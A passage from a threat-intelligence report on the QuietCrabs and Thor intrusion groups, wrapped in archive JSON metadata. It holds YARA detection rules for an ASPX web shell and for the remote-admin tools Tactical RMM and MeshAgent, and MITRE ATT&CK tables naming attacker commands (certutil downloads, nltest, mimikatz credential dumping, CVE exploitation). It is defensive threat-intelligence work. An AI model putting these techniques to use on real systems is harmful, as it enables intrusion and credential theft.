$v9 = \"Environment.GetLogicalDrives()\"\r\n $w1 = \"new FileStream\"\r\n $w2 = \"new FileInfo\"\r\n $w3 = \".Write(\"\r\n condition:\r\n $asp and filesize \u003c 100KB and (any of ($p*) or 2 of ($w*)) and (3 of ($v*) or 1 of ($v*) and $cmd)\r\n}\r\nrule PTESC_tool_multi_ZZ_TacticalRMM__RemoteAdmin {\r\n strings:\r\n $git = \"amidaware/rmmagent\"\r\n $s1 = \"Tactical RMM Agent\"\r\n $s2 = \"Path to custom meshcentral dir\"\r\n $s3 = \"NatsWSCompression\"\r\n $s4 = \"nixMeshAgentBin\"\r\n $s5 = \"limitNatsData\"\r\n $s6 = \"CleanupAgentUpdates\"\r\n $s7 = \"GetAgentCheckInConfig\"\r\n $s8 = \"SendPingCheckResult\"\r\n $s9 = \"WinSvcCheckResult\"\r\n $s10 = \"PendingActionPK\"\r\n $s11 = \"GetCheckInConfFromAPI\"\r\n $s12 = \"DjangoStringResp\"\r\n condition:\r\n (uint32be(0) == 0x7f454c46 or uint16(0) == 0x5a4d) and (5 of ($s*) or #git \u003e 10)\r\n}\r\nrule PTESC_tool_multi_ZZ_MeshAgent__RemoteAdmin {\r\n strings:\r\n $s1 = \"ScriptContainer.heapFinalizer\"\r\n $s2 = \"place .msh file with this executable\"\r\n $s3 = \"AgentCore/MeshServer\"\r\n $s4 = \"('MeshAgent')\"\r\n $s5 = \"addCompressedModule('agent-installer\"\r\n $s6 = \"MeshServer_ControlChannel\"\r\n $s7 = \"Cannot abort operation that is marked as 'wait for result'\"\r\n $s8 = \"compactDirtyMinimum\"\r\n $s9 = \"MeshConsole\"\r\n $s10 = \"Ooops, invalid socket: \"\r\n $s11 = \"Restart Failed, because Script Engine Stop failed\"\r\n $s12 = \"Secondary Agent unavailable to assist with self update\"\r\n condition:\r\n (uint16(0) == 0x5a4d or uint32be(0) == 0x7f454c46) and 5 of them\r\n}\r\nThe MITRE ATT\u0026CK Matrix\r\nQuiet Crabs\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 16 of 20\n\nID Name Description\r\nReconnaissance\r\nT1595.002\r\nActive Scanning:\r\nVulnerability Scanning\r\nObtained information on vulnerabilities in Microsoft\r\nSharePoint Server\r\nResource Development\r\nT1583.006\r\nAcquire Infrastructure:\r\nWeb Services\r\nUsed Amazon S3 to deliver KrustyLoader and Sliver\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nUsed the DigitalOcean hosting for C2 servers\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nUsed .vip domains for the Sliver C2 framework\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nUsed their custom malware KrustyLoader in attacks\r\nT1608.001 Stage Capabilities: Upload Malware\r\nInitial Access\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nExploited CVE-2025-53770, CVE-2025-53771, CVE-2025-\r\n4427, and CVE-2025-4428 for initial access.\r\nExecution\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nLaunched powershell.exe with the -Command parameter to\r\nrun Invoke-WebRequest and save results to a file\r\nPersistence\r\nT1505.003\r\nServer Software\r\nComponent: Web Shell\r\nAchieved persistence by uploading an ASPX file\r\nimplementing a simple web shell that accepts cmd and\r\ntimeout GET parameters\r\nDefense Evasion\r\nT1055 Process Injection\r\nDownloaded a component of the publicly available Sliver\r\npenetration testing framework and injected it into the\r\nexplorer.exe process\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nEncoded payloads using Base64\r\nCredential Access\r\nT1552 Unsecured Credentials\r\nRetrieved the SharePoint ASP.NET machineKey when\r\nexploiting CVE-2025-53770\r\nDiscovery\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nUsed a PowerShell script (Invoke-WebRequest -Uri\r\nhttp://ifconfig[.]me) to obtain the external IP address of the\r\ncompromised host\r\nCommand and Control\r\nT1105 Ingress Tool Transfer Used KrustyLoader to deliver payloads.\r\nT1071.004\r\nApplication Layer\r\nProtocol: Web Protocols\r\nIn addition to Sliver implants, QuietCrabs loaded files hosted\r\nin Amazon S3 to victim systems over HTTP and HTTPS\r\nDownload as:\r\nThor\r\nID Name Description\r\nReconnaissance\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 17 of 20\n\nID Name Description\r\nT1595.002\r\nActive Scanning:\r\nVulnerability Scanning\r\nUsed Fscan to identify vulnerable services\r\nResource Development\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nUsed servers both for active scanning and as C2 for their\r\nmalware\r\nT1608.002\r\nStage Capabilities:\r\nUpload Tool\r\nPrepared attacks and uploaded tools to their own\r\ninfrastructure in advance\r\nT1608.001\r\nStage Capabilities:\r\nUpload Malware\r\nPrepared attacks and uploaded malware to their own\r\ninfrastructure in advance\r\nT1588.002 Obtain Capabilities: Tool\r\nUsed tools such as mimikatz, GodPotato, and others in their\r\nattacks\r\nInitial Access\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nExploited CVE-2023-38035 and CVE-2025-53770 for initial\r\naccess\r\nExecution\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nDownloaded and executed various PowerShell scripts with\r\ncertutil, and used the PowerShel-based ADRecon tool\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nRan some scripts via cmd.exe\r\nT1059.005\r\nCommand and Scripting\r\nInterpreter: Visual Basic\r\nUsed various Visual Basic scripts in their attacks\r\nPersistence\r\nT1543.003\r\nCreate or Modify System\r\nProcess: Windows\r\nService\r\nAchieved persistence by installing MeshAgent and Tactical\r\nRMM as services\r\nT1136.001\r\nCreate Account: Local\r\nAccount\r\nCreated srv accounts\r\nT1098.007\r\nAccount Manipulation:\r\nAdditional Local or\r\nDomain Groups\r\nAdded the srv account to the local administrator group\r\nT1053 Scheduled Task/Job Created scheduled tasks\r\nT1133 External Remote Services\r\nAccessed employee mailboxes via Outlook Web Access\r\n(OWA)\r\nPrivilege Escalation\r\nT1548\r\nAbuse Elevation Control\r\nMechanism\r\nUsed the public GodPotato utility for privilege escalation\r\nT1078.002\r\nValid Accounts: Domain\r\nAccounts\r\nUsed domain accounts for lateral movement and further\r\nattack development\r\nT1078.003\r\nValid Accounts: Local\r\nAccounts\r\nUsed the created local srv account for RDP access\r\nDefense Evasion\r\nT1078 Valid Accounts\r\nPerformed Kerberos authentication over SSH and corporate\r\nVPN using compromised credentials to access internal\r\nsystems\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 18 of 20\n\nID Name Description\r\nT1562 Impair Defenses\r\nDownloaded and ran PowerShell scripts designed to add\r\nTactical RMM and MeshAgent to Windows Defender EPP\r\nexclusions\r\nT1218\r\nSystem Binary Proxy\r\nExecution\r\nRan the Windows native setx.exe utility to set environment\r\nvariables, as well as the native Windows Server configuration\r\nutility\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nEncoded payloads using Base64\r\nCredential Access\r\nT1003 OS Credential Dumping Used secretsdump and mimikatz to extract account data\r\nT1552.004 Unsecured Credentials\r\nRetrieved the SharePoint ASP.NET machineKey while\r\nexploiting CVE-2025-53770\r\nDiscovery\r\nT1018\r\nRemote System\r\nDiscovery\r\nTested network connectivity using the Test-NetConnection\r\ncommand to verify the availability of remote systems before\r\nloading a reverse shell\r\nT1482 Domain Trust Discovery\r\nUsed ADRecon for Active Directory reconnaissance, saving\r\nresults to C:/Users/srv/Desktop/ADRecon-Report-date.zip,\r\nwhich was later accessed by the attackers\r\nT1046\r\nNetwork Service\r\nDiscovery\r\nCollected information about services for subsequent\r\nvulnerability exploitation\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nUsed the ADRecon tool to collect information\r\nT1082\r\nSystem Information\r\nDiscovery\r\nRan systeminfo and whoami /priv to obtain host details,\r\nincluding OS information, current user, and privileges\r\nT1057 Process Discovery\r\nUsed tasklist and native Windows utilities to obtain the list of\r\nprocesses running on a compromised host\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nExecuted dir C:\\users\\public and type C:/users/public/res.txt\r\nto obtain the contents of C:\\Users\\Public and create (read)\r\nres.txt\r\nT1482 Domain Trust Discovery\r\nRan nltest /dclist to obtain the list of domain controllers and\r\nnltest /trusted_domains to obtain the list of trusted domains\r\nT1087.002\r\nAccount Discovery:\r\nDomain Account\r\nUsed the Windows native quser utility to collect information\r\nabout user sessions on remote desktop session host servers\r\nT1033\r\nSystem Owner/User\r\nDiscovery\r\nRan whoami to determine the current user\r\nT1069\r\nPermission Groups\r\nDiscovery\r\nRan the public ADRecon utility for Active Directory\r\nreconnaissance\r\nLateral Movement\r\nT1021.001\r\nRemote Services: Remote\r\nDesktop Protocol\r\nUsed RDP user accounts, including those they created, for\r\nlateral movement\r\nT1021.002\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nAttempted to use SMB connections for lateral movement\r\nT1021.004 Remote Services: SSH\r\nPerformed Kerberos authentication over SSH using\r\ncompromised credentials\r\nT1210\r\nExploitation of Remote\r\nServices\r\nExploited CVE-2020-1472 for further lateral movement\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 19 of 20\n\nID Name Description\r\nT1550.003\r\nUse Alternate\r\nAuthentication Material:\r\nPass the Ticket\r\nAttempted Kerberos authentication to connect to hosts using\r\na previously compromised user account\r\nCollection\r\nT1213.001\r\nData from Information\r\nRepositories: Confluence\r\nCollected information from multiple spaces in Atlassian\r\nConfluence\r\nT1114 Email Collection\r\nCompromised employee email data and accessed multiple\r\nmailboxes potentially containing confidential information\r\nCommand And Control\r\nT1219 Remote Access Tools\r\nInstalled Tactical RMM and MeshAgent to obtain remote\r\naccess and control\r\nT1105 Ingress Tool Transfer\r\nUsed certutil to download various PowerShell scripts and\r\nutilities such as GodPotato, Cobalt Strike, and others\r\nDownload as:\r\nShare link\r\nSource: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/" ], "report_names": [ "dragons-in-thunder" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8", "created_at": "2024-01-18T02:02:34.643994Z", "updated_at": "2026-04-10T02:00:04.959645Z", "deleted_at": null, "main_name": "UNC5221", "aliases": [ "UNC5221", "UTA0178" ], "source_name": "ETDA:UNC5221", "tools": [ "BRICKSTORM", "GIFTEDVISITOR", "GLASSTOKEN", "LIGHTWIRE", "PySoxy", "THINSPOOL", "WARPWIRE", "WIREFIRE", "ZIPLINE" ], "source_id": "ETDA", "reports": null }, { "id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9", "created_at": "2024-01-12T02:00:04.33082Z", "updated_at": "2026-04-10T02:00:03.517264Z", "deleted_at": null, "main_name": "UTA0178", "aliases": [ "UNC5221", "Red Dev 61" ], "source_name": "MISPGALAXY:UTA0178", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434390, "ts_updated_at": 1775791474, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/640b2ead9c53caeecfe0eddaedfd4b9b453e63e7.pdf", "text": "https://archive.orkl.eu/640b2ead9c53caeecfe0eddaedfd4b9b453e63e7.txt", "img": "https://archive.orkl.eu/640b2ead9c53caeecfe0eddaedfd4b9b453e63e7.jpg" } }